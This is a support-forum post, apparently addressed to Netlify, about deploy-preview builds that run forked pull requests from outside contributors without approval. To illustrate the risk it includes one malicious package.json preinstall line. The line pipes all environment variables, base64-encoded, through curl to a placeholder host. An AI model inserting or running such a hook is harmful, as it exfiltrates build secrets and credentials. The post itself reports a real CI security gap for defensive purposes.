Preview build on public repositories from external contributors

Hello, Netlify!

We have a security issue reported to us and we are looking for a resolution.
We have a public repository. This repository is set up to be deployed on our “Open source unlimited” Netlify team.
For this site, “deploy previews” are enabled.

This is the scenario we need help with:

  • An outside contributor forks our repository and creates a pull request with malicious code, for example by adding a preinstall command to package.json such as:
"preinstall": "set | base64 | curl -X POST --insecure --data-binary @- https://{YourHostName}/?",
  • GitHub provides us the means to not run any CI until the PR is reviewed and approved by a repository owner.
  • But Netlify kicks off the PR preview build immediately when the PR is created (without waiting for any approval).

As a result, any malicious command could be executed during the Netlify build and we have no way of preventing it.

Is there any possibility for Netlify builds to respect the GitHub settings “Fork pull request workflows from outside collaborators” and “Require approval for all outside collaborators” before kicking off a PR preview build?

Site: Netlify App
Build: Netlify App

I believe this can be configured here: Netlify App, which is currently set to “deploy without restrictions”.